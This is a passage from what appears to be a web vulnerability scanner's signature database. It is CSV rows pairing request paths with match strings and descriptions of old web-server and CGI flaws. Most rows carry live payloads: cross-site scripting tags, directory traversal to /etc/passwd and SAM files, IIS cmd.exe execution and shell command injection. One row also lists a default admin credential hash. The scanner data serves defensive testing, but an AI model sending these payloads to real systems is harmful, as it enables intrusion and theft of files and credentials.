"003262","5108","4","/sysuser/docmgr/search.stm?query=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"003263","514","8","/isapi/tstisapi.dll","GET","Pi3web","","","","","The test tstisapi.dll is available and can allow attackers to execute commands remotely.","",""
"003264","524","7","@CGIDIRSbb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK","GET","root:","","","","","PHP-Nuke is vulnerable to a remote file retrieval vuln. It should be upgraded to the latest version. CVE-2001-0320","",""
"003265","524","7","@NUKEbb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK","GET","root:","","","","","PHP-Nuke is vulnerable to a remote file retrieval vuln. It should be upgraded to the latest version. CVE-2001-0320","",""
"003266","5324","7","/lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/jabber/comment2.jse+/system/autoexec.ncf","GET","SET CLIENT FILE","","","","","Default scripts can allow arbitrary access to the host.","",""
"003267","5325","7","/lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/viewcode.jse+httplist+httplist/../../../../../system/autoexec.ncf","GET","Source for file","","","","","Novell web server allows any file on the system to viewed through the viewcode.jsp file","",""
"003268","534","7","@CGIDIRSustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd","GET","200","","","","","ustorekeeper will display arbitrary files. CVE-2001-0466","",""
"003269","534","7","@CGIDIRSustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd","GET","root:","","","","","This CGI allows attackers to read arbitrary files remotely. CVE-2001-0466.","",""
"003270","539","d","/catinfo","GET","200","","","","","May be vulnerable to a buffer overflow. Request '/catinfo?' and add on 2048 of garbage to test.","",""
"003271","5407","a","/soap/servlet/soaprouter","GET","200","","","","","Oracle 9iAS SOAP components allow anonymous users to deploy applications by default.","",""
"003272","543","7","/opendir.php?/etc/passwd","GET","root:","","","","","This PHP-Nuke CGI allows attackers to read any file on the web server. CVE-2001-0321","",""
"003273","543","7","/opendir.php?requesturl=/etc/passwd","GET","root:","","","","","This PHP-Nuke CGI allows attackers to read any file on the web server. CVE-2001-0321","",""
"003274","5457","4","/webtools/bonsai/cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('Vulnerable')</script>&branch=HEAD","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"003275","5457","4","@CGIDIRScvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('Vulnerable')</script>&branch=HEAD","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"003276","5458","4","/webtools/bonsai/cvsquery.cgi?branch=<script>alert('Vulnerable')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"003277","5458","4","/webtools/bonsai/cvsquery.cgi?module=<script>alert('Vulnerable')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"003278","5458","4","@CGIDIRScvsquery.cgi?branch=<script>alert('Vulnerable')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"003279","5458","4","@CGIDIRScvsquery.cgi?module=<script>alert('Vulnerable')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"003280","5459","4","/webtools/bonsai/cvslog.cgi?file=*&rev=&root=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"003281","5459","4","/webtools/bonsai/cvslog.cgi?file=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"003282","5459","4","@CGIDIRScvslog.cgi?file=*&rev=&root=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"003283","5459","4","@CGIDIRScvslog.cgi?file=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"003284","5460","4","/webtools/bonsai/cvsblame.cgi?file=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"003285","5460","4","@CGIDIRScvsblame.cgi?file=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"003286","5461","4","/webtools/bonsai/showcheckins.cgi?person=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"003287","5461","4","@CGIDIRSshowcheckins.cgi?person=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"003288","6659","4","/JUNK(223)<font%20size=50>DEFACED<!--//--","GET","<font size=50>DEFACED<","","","not found","","MyWebServer 1.0.2 is vulnerable to HTML injection. Upgrade to a later version.","",""
"003289","5523","d","/MWS/HandleSearch.html?searchTarget=test&B1=Submit","GET","200","","","","","MyWebServer 1.0.2 may be vulnerable to a buffer overflow (untested). Upgrade to a later version if 990b of searched data crashes the server.","",""
"003290","554","7","@CGIDIRSa1disp3.cgi?../../../../../../../../../../etc/passwd","GET","root:","","","","","This CGI allows attackers read arbitrary files on the host.","",""
"003291","554","7","@CGIDIRSa1stats/a1disp3.cgi?../../../../../../../../../../etc/passwd","GET","root:","","","","","This CGI allows attackers read arbitrary files on the host.","",""
"003292","554","7","@CGIDIRSa1stats/a1disp3.cgi?../../../../../../../etc/passwd","GET","root:","","","","","Remote file retrieval.","",""
"003293","554","7","@CGIDIRSa1stats/a1disp4.cgi?../../../../../../../etc/passwd","GET","root:","","","","","Remote file retrieval.","",""
"003294","556","8","/certsrv/..%255cwinnt/system32/cmd.exe?/c+dir","GET","<DIR>","","","","","IIS is vulnerable to a double-decode bug that allows commands to be executed on the system. CVE-2001-0333. BID-2708.","",""
"003295","556","8","/cgi-bin/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir","GET","<DIR>","","","","","IIS is vulnerable to a double-decode bug that allows commands to be executed on the system. CVE-2001-0333. BID-2708.","",""
"003296","556","8","/iisadmpwd/..%255c..%255cwinnt/system32/cmd.exe?/c+dir","GET","<DIR>","","","","","IIS is vulnerable to a double-decode bug that allows commands to be executed on the system. CVE-2001-0333. BID-2708.","",""
"003297","556","8","/msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir","GET","<DIR>","","","","","IIS is vulnerable to a double-decode bug that allows commands to be executed on the system. CVE-2001-0333. BID-2708.","",""
"003298","556","8","/pbserver/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir","GET","<DIR>","","","","","IIS is vulnerable to a double-decode bug that allows commands to be executed on the system. CVE-2001-0333. BID-2708.","",""
"003299","556","8","/rpc/..%255c..%255cwinnt/system32/cmd.exe?/c+dir","GET","<DIR>","","","","","IIS is vulnerable to a double-decode bug that allows commands to be executed on the system. CVE-2001-0333. BID-2708.","",""
"003300","556","8","/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir","GET","<DIR>","","","","","IIS is vulnerable to a double-decode bug that allows commands to be executed on the system. CVE-2001-0333. BID-2708.","",""
"003301","556","8","/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+ver","GET","\[Version\]","","","","","IIS is vulnerable to a double-decode bug that allows commands to be executed on the system. CVE-2001-0333. BID-2708.","",""
"003302","556","8","/_vti_bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir","GET","<DIR>","","","","","IIS is vulnerable to a double-decode bug that allows commands to be executed on the system. CVE-2001-0333. BID-2708.","",""
"003303","562","3","/server-info","GET","200","Server Information","","","","This gives a lot of Apache information. Comment out appropriate line in httpd.conf or restrict access to allowed hosts.","",""
"003304","5689","4","@CGIDIRSnamazu.cgi","GET","200","","","","","Namazu search engine found. Vulnerable to XSS attacks (fixed 2001-11-25). Attacker could write arbitrary files outside docroot (fixed 2000-01-26). CA-2000-02.","",""
"003305","5692","3","/oekaki/","GET","\.conf","","","","","The PaintBBS Server may allow unauthorized access to the config files.","",""
"003306","5709","3","/.nsconfig","GET","200","","","","","Contains authorization information","",""
"003307","5709","3","@CGIDIRS.nsconfig","GET","200","","","","","Contains authorization information","",""
"003308","582","2","/?D=A","GET","[Ii]ndex [Oo]f \\\/","","","","","Apache allows directory listings by requesting.","",""
"003309","582","2","/?N=D","GET","[Ii]ndex [Oo]f \\\/","","","","","Apache allows directory listings by requesting.","",""
"003310","582","2","/?S=A","GET","[Ii]ndex [Oo]f \\\/","","","","","Apache allows directory listings by requesting.","",""
"003311","582","23","/?M=A","GET","[Ii]ndex [Oo]f \\\/","","","","","Apache allows directory listings. Upgrade Apache or disable directory indexing.","",""
"003312","583","7","/cgi-bin/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%57%49%4E%4E%54%2F%73%79%73%74%65%6D%33%32%2Fping.exe%20127.0.0.1","GET","Reply from 127\.0\.0\.1","","","","","Specially formatted strings allow command execution. Upgrade to version 1.15 or higher. CVE-2000-0011.","",""
"003313","583","7","/cgi-bin/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%57%69%6E%64%6F%77%73%2Fping.exe%20127.0.0.1","GET","200","","","","","Specially formatted strings allow command execution. Upgrade to version 1.15 or higher. CVE-2000-0011.","",""
"003314","596","3","/dc/auth_data/auth_user_file.txt","GET","200","","","","","The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information.","",""
"003315","596","3","/dc/orders/orders.txt","GET","200","","","","","The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information.","",""
"003316","596","3","/dcshop/auth_data/auth_user_file.txt","GET","200","","","","","The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information.","",""
"003317","596","3","/dcshop/orders/orders.txt","GET","200","","","","","The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information.","",""
"003318","635","8","@CGIDIRSshop.pl/page=;cat%20shop.pl|","GET","\\\/perl","","","","","Shopping Cart (Hassan) allows execution of remote commands. CVE-2001-0985.","",""
"003319","641","7","@CGIDIRSview_item?HTML_FILE=../../../../../../../../../../etc/passwd%00","GET","root:","","","","","sglMerchant allows reading of remote files. CVE-2001-1019.","",""
"003320","644","3","/.FBCIndex","GET","Bud2","","","","","This file on OSX contains the source of the files in the directory. http://www.securiteam.com/securitynews/5LP0O005FS.html","",""
"003321","645","7","@CGIDIRSshopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;cat%20/etc/passwd|","GET","root:","","","","","ShopPlus Cart allows arbitrary command execution. CVE-2001-0992.","",""
"003322","646","8","@CGIDIRSeshop.pl/seite=;cat%20eshop.pl|","GET","\\\/perl","","","","","This CGI allows attackers to execute commands on the remote server. CVE-2001-1014.","",""
"003323","6659","4","/JUNK(223)<font%20size=50><script>alert(11)</script><!--//--","GET","<script>alert\(11\)<\/script>","","","","","MyWebServer 1.0.2 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"003324","6661","7","@CGIDIRSion-p.exe?page=c:\winnt\repair\sam","GET","200","","","","","Ion-P allows remote file retrieval.","",""
"003325","6661","7","@CGIDIRSion-p?page=../../../../../etc/passwd","GET","root:","","","","","Ion-P allows remote file retrieval.","",""
"003326","6663","7","/..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cboot.ini","GET","boot loader","","","","","GoAhead Web Server 2.1 is vulnerable to arbitrary file retrieval, upgrade to the latest version.","",""
"003327","6663","7","/..%5C..%5C..%5C..%5C..%5C..%5C/winnt/win.ini","GET","\[windows\]","\[fonts\]","","","","GoAhead Web Server 2.1 is vulnerable to arbitrary file retrieval.","",""
"003328","6666","6","/cgi-bin/hpnst.exe?c=p+i=SrvSystemInfo.html","GET","200","","","","","HP Instant TopTools GoAhead WebServer hpnst.exe may be vulnerable to a DoS.","",""
"003329","6670","3","/applist.asp","GET","200","","","","","Citrix server may allow remote users to view applications installed without authenticating.","",""
"003330","6671","3","/launch.asp?NFuse_Application=LookOut&NFuse_MIMEExtension=.ica","GET","200","","","","","Citrix server may reveal sensitive information by accessing the 'advanced' tab on hte login screen.","",""
"003331","6672","a","/_layouts/alllibs.htm","GET","200","","","","","Microsoft SharePoint Portal and Team Services vulnerable to NT or NTLM authentication bypass on Win2000 SP4 using IE 6.x. Bugtraq 03-11-19 post by arkanian@hacker.am","",""
"003332","6672","a","/_layouts/settings.htm","GET","200","","","","","Microsoft SharePoint Portal and Team Services vulnerable to NT or NTLM authentication bypass on Win2000 SP4 using IE 6.x. Bugtraq 03-11-19 post by arkanian@hacker.am","",""
"003333","6672","a","/_layouts/userinfo.htm","GET","200","","","","","Microsoft SharePoint Portal and Team Services vulnerable to NT or NTLM authentication bypass on Win2000 SP4 using IE 6.x. Bugtraq 03-11-19 post by arkanian@hacker.am","",""
"003334","6673","8","@CGIDIRSindex.pl","GET","Powered By WebGUI 4\.6\.8","","","","","WebGUI version 4.6.8, according to the documentation, may allow arbitrary code execution. http://freshmeat.net/users/rizen/.","",""
"003335","6694","3","/.DS_Store","GET","Bud1","","","","","Apache on Mac OSX will serve the .DS_Store file, which contains sensitive information. Configure Apache to ignore this file or upgrade to a newer version.","",""
"003336","6695","3","@CGIDIRSrwcgi60","GET","200","","","","","Oracle report server reveals system information without authorization. See Oracle note 133957.1 - Restricting Access to the Reports Server Environment and Output","",""
"003337","6695","3","@CGIDIRSrwcgi60/showenv","GET","200","","","","","Oracle report server reveals system information without authorization. See Oracle note 133957.1 - Restricting Access to the Reports Server Environment and Output","",""
"003338","6696","8","@CGIDIRSindex.pl","GET","Powered By WebGUI 4\.6\.9","","","","","WebGUI version 4.6.9 has a 'very obsure and unlikely security hole' according to the documentation. .","",""
"003339","6697","3","@CGIDIRSindex.pl","GET","Powered By WebGUI 4\.5\.0","","","","","WebGUI version 4.5.0 according to the documentation, a user could view collateral data of a wobject if the URL is known. http://freshmeat.net/users/rizen/.","",""
"003340","6698","8","@CGIDIRSclassifieds/classifieds.cgi","GET","200","","","","","Mike's Classifieds CGI contains a bug that allows arbitrary command execution on the server (untested), see http://freshmeat.net/projects/myclassifieds/","",""
"003341","6699","8","@CGIDIRScalendar/index.cgi","GET","200","","","","","Mike's Calendar CGI contains a bug that allows arbitrary command execution (version 1.4), see http://freshmeat.net/projects/mycalendar/","",""
"003342","670","3","/stronghold-info","GET","200","","","","","Redhat Stronghold from versions 2.3 up to 3.0 discloses sensitive information. This gives information on configuration. CVE-2001-0868.","",""
"003343","670","3","/stronghold-status","GET","200","","","","","Redhat Stronghold from versions 2.3 up to 3.0 discloses sensitive information. CVE-2001-0868.","",""
"003344","674","3","/blah-whatever.jsp","GET","JSP file \"","","","","","The Apache Tomcat 3.1 server reveals the web root path when requesting a non-existent JSP file. CVE-2000-0759.","",""
"003345","677","7","/gallery/index.php?include=../../../../../../../../../etc/passwd","GET","root:","","","","","Gallery allows files to be read remotely. CVE-2001-0900.","",""
"003346","677","7","/modules.php?set_albumName=album01&id=aaw&op=modload&name=gallery&file=index&include=../../../../../../../../../etc/passwd","GET","root:","","","","","Gallery Addon for PHP-Nuke allows files to be read remotely. CVE-2001-0900.","",""
"003347","684","4","@CGIDIRS../../../../../../../../../../WINNT/system32/ipconfig.exe","GET","IP Configuration","","","","","Alchemy Eye and Alchemy Network Monitor for Windows allow attackers to execute arbitrary commands.","",""
"003348","684","4","@CGIDIRSNUL/../../../../../../../../../WINNT/system32/ipconfig.exe","GET","IP Configuration","","","","","Alchemy Eye and Alchemy Network Monitor for Windows allow attackers to execute arbitrary commands.","",""
"003349","684","4","@CGIDIRSPRN/../../../../../../../../../WINNT/system32/ipconfig.exe","GET","IP Configuration","","","","","Alchemy Eye and Alchemy Network Monitor for Windows allow attackers to execute arbitrary commands.","",""
"003350","694","7","/phprocketaddin/?page=../../../../../../../../../../etc/passwd","GET","root:","","","","","The PHP-Nuke Rocket add-in is vulnerable to file traversal, allowing an attacker to view any file on the host.","",""
"003351","698","4","@CGIDIRSstore/agora.cgi?cart_id=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Agora.cgi is vulnerable to Cross Site Scripting (XSS), CVE-2001-1199, CA-2000-02.","",""
"003352","7","6","/iissamples/exair/howitworks/Code.asp","GET","200","","","","","Scripts within the Exair package on IIS 4 can be used for a DoS against the server. CVE-1999-0449. BID-193.","",""
"003353","7","6","/iissamples/exair/howitworks/Codebrw1.asp","GET","200","","","","","This is a default IIS script/file which should be  removed, it may allow a DoS against the server. CVE-1999-0738. MS99-013. CVE-1999-0449. BID-193.","",""
"003354","7","7","/msadc/Samples/selector/showcode.asp?source=/msadc/Samples/../../../../../../../../../winnt/win.ini","GET","\[fonts\]","","","","","This allows attackers to read arbitrary files on the host. CVE-1999-0736. MS99-013.","",""
"003355","701","4","/pls/dadname/htp.print?cbuf=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Oracle 9iAS is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"003356","701","4","/pls/help/<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Oracle 9iAS is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"003357","707","3","/demo/ojspext/events/globals.jsa","GET","event:application_OnStart","","","","","Oracle 9iAS allows .jsa files to be retrieved, which may contain sensitive information.","",""
"003358","707","3","/globals.jsa","GET","200","","","","","Oracle globals.jsa file","",""
"003359","711","7","/pls/sample/admin_/help/..%255cplsql.conf","GET","Directives added for mod-plsql","","","","","Oracle 9iAS allows mod_plsql to perform a directory traversal.","",""
"003360","712","3","/servlet/oracle.xml.xsql.XSQLServlet/xsql/lib/XSQLConfig.xml","GET","On a PRODUCTION system","","","","","Oracle 9iAS configuration file found - see Bugtraq #4290.","",""
"003361","721","7","/..%252f..%252f..%252f..%252f..%252f../windows/repair/sam","GET","200","","","Forbidden","","BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information.","",""
"003362","721","7","/..%252f..%252f..%252f..%252f..%252f../winnt/repair/sam","GET","200","","","Forbidden","","BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information.","",""
"003363","721","7","/..%252f..%252f..%252f..%252f..%252f../winnt/repair/sam._","GET","200","","","Forbidden","","BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information.","",""
"003364","721","7","/..%255c..%255c..%255c..%255c..%255c../windows/repair/sam","GET","200","","","Forbidden","","BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information.","",""
"003365","721","7","/..%255c..%255c..%255c..%255c..%255c../winnt/repair/sam","GET","200","","","Forbidden","","BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information.","",""
"003366","721","7","/..%255c..%255c..%255c..%255c..%255c../winnt/repair/sam._","GET","200","","","Forbidden","","BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information.","",""
"003367","721","7","/..%2F..%2F..%2F..%2F..%2F../windows/repair/sam","GET","200","","","Forbidden","","BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information.","",""
"003368","721","7","/..%2F..%2F..%2F..%2F..%2F../winnt/repair/sam","GET","200","","","Forbidden","","BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information.","",""
"003369","721","7","/..%2F..%2F..%2F..%2F..%2F../winnt/repair/sam._","GET","200","","","Forbidden","","BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information.","",""
"003370","724","8","/ans.pl?p=../../../../../usr/bin/id|&blah","GET","uid","","","","","Avenger's News System allows commands to be issued remotely.  http://ans.gq.nu/ default admin string 'admin:aaLR8vE.jjhss:root@127.0.0.1', password file location 'ans_data/ans.passwd'","",""
"003371","724","8","/ans/ans.pl?p=../../../../../usr/bin/id|&blah","GET","uid","","","","","Avenger's News System allows commands to be issued remotely.","",""
"003372","761","8","@CGIDIRScsSearch.cgi?command=savesetup&setup=`cat%20/etc/passwd`","GET","root:","","","","","csSearch (http://www.cgiscript.net/) has a major flaw that allows Perl to be executed remotely. Upgrade to a version higher than 2.3. CVE-2002-0495.","",""
"003373","768","3","/?\"><script>alert('Vulnerable');</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","IIS is vulnerable to Cross Site Scripting (XSS). See MS02-018, CVE-2002-0075, SNS-49, CA-2002-09","",""
"003374","3341","3","/JUNK(10)abcd.html","GET","\+ displayresult \+","","","","","The IIS 4.0, 5.0 and 5.1 server may be vulnerable to Cross Site Scripting (XSS) in redirect error messages.","",""
"003375","782","6","/iissamples/exair/howitworks/codebrws.asp","GET","ASP Source code browser","","","","","This is a default IIS script/file that should be removed. It may allow a DoS against the server or a DoS. XF-2383 BID-0167.","",""
"003376","783","36","/servlet/com.newatlanta.servletexec.JSP10Servlet/..%5c..%5cglobal.asa","GET","OBJECT RUNAT=Server","","","","","ServletExec 4.1 ISAPI Java Servlet/JSP Engine for IIS can reveal source code. The server may also be vulnerable to a DoS attack by requesting a long file name ending in .jsp","",""
"003377","784","36","/servlet/com.newatlanta.servletexec.JSP10Servlet/","GET","The file was not found","","","","","ServletExec 4.1 ISAPI Java Servlet/JSP Engine for IIS discloses the web root. The server may also be vulnerable to a DoS attack by requesting a long file name ending in .jsp","",""
"003378","789","3","/iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/%c0%ae%c0%ae/bogus_directory/nonexistent.asp","GET","Path not found","","","","","CodeBrws.asp can be used to determine if a file system path exists or not. CVE-1999-0739. MS99-013.","",""
"003379","789","5","/iissamples/sdk/asp/docs/codebrws.asp","GET","View Active Server Page Source","","","","","IIS 5 comes with an ASP that allows remote code to viewed. All default files in /IISSamples should be removed. CVE-1999-0739. MS99-013.","",""
"003380","789","5","/iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/default.asp","GET","200","","","","","IIS may be vulnerable to source code viewing via the example CodeBrws.asp file. Remove all default files from the web root. CVE-1999-0739. MS99-013.","",""
"003381","859","7","/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini","GET","\[windows\]","","","","","Apache allows files to be retrieved outside of the web root. Apache should be upgraded to 2.0.40 or above. CVE-2002-0661.","",""
"003382","859","7","/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini","GET","\[fonts\]","","","","","Apache allows files to be retrieved outside of the web root. Apache should be upgraded to 2.0.40 or above. CVE-2002-0661.","",""
"003383","96","7","/iissamples/exair/search/query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini","GET","\[fonts\]","","","","","This allows arbitrary files to be retrieved from the server. It may allow a DoS against the server. CVE-1999-0449. BID-193. MS01-033.","",""
"003384","96","7","/iissamples/exair/search/search.idq?CiTemplate=../../../../../../../../../../winnt/win.ini","GET","\[fonts\]","","","","","This allows arbitrary files to be retrieved from the server. It may allow a DoS against the server. CVE-1999-0449. BID-193. MS01-033.","",""
"003385","9624","3","/pass_done.php","GET","200","","","","","PY-Membres 4.2 may allow users to execute a query which generates a list of usernames and passwords.","",""
"003386","9624","a","/admin/admin.php?adminpy=1","GET","200","","","","","PY-Membres 4.2 may allow administrator access.","",""
"003387","0","1","/iishelp/iis/htm/tutorial/redirect.asp","GET","A URL is required","","","","","Possibly unchecked redirect with url= variable.","",""
"003388","9695","3","/servlet/SnoopServlet","GET","Client Information","","","","","JRun, Netware Java Servlet Gateway, or WebSphere default servlet found. All default code should be removed from servers.","",""
"003389","3268","2","/Citrix/PNAgent/","GET","[Ii]ndex [Oo]f ","","","","","Directory indexing found.","",""
"003390","3268","2","/Citrix/ICAWEB/","GET","[Ii]ndex [Oo]f ","","","","","Directory indexing found.","",""
"003391","3268","2","/IBMWebAS/","GET","[Ii]ndex [Oo]f ","","","","","Directory indexing found.","",""
"003392","3268","2","/IBMWebAS/docs/","GET","[Ii]ndex [Oo]f ","","","","","Directory indexing found.","",""
"003393","3233","1","/IBMWebAS/apidocs/","GET","IBM WebSphere","","","","","IBM Websphere documentation found.","",""
"003394","3233","1","/IBMWebAS/configDocs/","GET","WebSphere Configuration","","","","","IBM Websphere documentation found.","",""
"003395","3268","2","/IBMWebAS/mbeanDocs/","GET","[Ii]ndex [Oo]f ","","","","","Directory indexing found. IBM Websphere documentation.","",""
"003396","3092","1","/iishelp/iis/misc/default.asp","GET","Microsoft Internet Information Services","","","","","Default IIS page found.","",""
"003397","3092","1","/Citrix/MetaFrameXP/default/login.asp","GET","MetaFrame XP","","","","","Citrix MetaFrame login.","",""
"003398","3233","1","/manager/html-manager-howto.html","GET","Application Manager","","","","","Tomcat documentation found.","",""
"003399","3233","1","/manager/manager-howto.html","GET","Manager App","","","","","Tomcat documentation found.","",""
"003400","3233","1","/includes/adovbs.inc","GET","Microsoft ADO","","","","","Default Microsoft file found.","",""
"003401","3233","1","/adovbs.inc","GET","Microsoft ADO","","","","","Microsoft default file found.","",""
"003402","3092","13","/fcgi-bin/echo","GET","FastCGI echo","","","","","The FastCGI echo program may reveal system info or lead to other attacks.","",""
"003403","3092","13","/fcgi-bin/echo2","GET","FastCGI echo","","","","","The FastCGI echo2 program may reveal system info or lead to other attacks.","",""
"003404","3233","1","/pls/ldc/admin_/","GET","Gateway Configuration","","","","","Oracle Gateway Configuration application.","",""
"003405","3233","1","/demo/basic/simple/viewsrc/welcomeuser.jsp.txt","GET","WelcomeUser JSP","","","","","Default demo code found.","",""
"003406","3092","13","/README","GET","OracleJSP","200","","","","README file found.","",""
"003407","3092","13","/demo/xml/xmlquery/viewsrc/XMLQuery.jsp.txt","GET","Oracle Corporation","","","","","Default Oracle code found.","",""
"003408","3092","1","/soapdocs/webapps/soap/","GET","Oracle SOAP","","","","","Oracle SOAP application.","",""
"003409","3092","1","/soapdocs/webapps/soap/WEB-INF/config/soapConfig.xml","GET","SOAP configuration file","","","","","SOAP server configuration file.","",""
"003410","20954","4","/shopadmin.asp?Password=abc&UserName=\"><script>alert(foo)</script>","GET","<script>alert\(foo\)<\/script>","","","","","VP-ASP Shopping Cart 5.50 shopadmin.asp UserName Variable XSS.","",""
"003411","20406","4","/phpinfo.php?GLOBALS[test]=<script>alert(document.cookie);</script>","GET","<script>alert\(document\.cookie\);<\/script>","","","","","PHP contains a flaw that allows a remote cross site scripting attack.","",""
"003412","24484","4","/phpinfo.php?cx[]=JUNK(4096)<script>alert(foo)</script>","GET","<script>alert\(foo\)<\/script>","","","","","PHP 5.1.2 and 4.4.2 phpinfo() Function Long Array XSS","",""
"003413","3233","1","/j2ee/","GET","200","","","","","j2ee directory found--possibly an Oracle app server directory.","",""
"003414","3233","3","@CGIDIRSprintenv.tmp","GET","DOCUMENT_ROOT","","","","","Apache 2.0 default script is executable and gives server environment variables. All default scripts should be removed. It may also allow XSS types of attacks. BID-4431.","",""
"003415","3233","1","/perl/printenv","GET","DOCUMENT_ROOT","","","","","Apache 2.0 default script is executable and gives server environment variables. All default scripts should be removed. It may also allow XSS types of attacks. BID-4431.","",""
"003416","3233","3","/perl-status","GET","Embedded Perl","","","","","Perl status page found. This may reveal details about the Perl installation and operating system.","",""
"003417","3233","13","/WebCacheDemo.html","GET","200","","","","","Oracle WebCache Demo","",""
"003418","32333","13","/webcache/","GET","200","","","","","Oracle WebCache Demo","",""
"003419","3233","13","/webcache/webcache.xml","GET","200","","","","","Oracle WebCache Demo","",""
"003420","3233","13","/bmp/","GET","200","","","","","SQLJ Demo Application","",""
"003421","3233","13","/bmp/global-web-application.xml","GET","200","","","","","SQLJ Demo Application","",""
"003422","3233","13","/bmp/JSPClient.java","GET","200","","","","","SQLJ Demo Application","",""
"003423","3233","13","/bmp/mime.types","GET","200","","","","","SQLJ Demo Application","",""
"003424","3233","13","/bmp/README.txt","GET","200","","","","","SQLJ Demo Application","",""
"003425","3233","13","/bmp/sqljdemo.jsp","GET","200","","","","","SQLJ Demo Application","",""
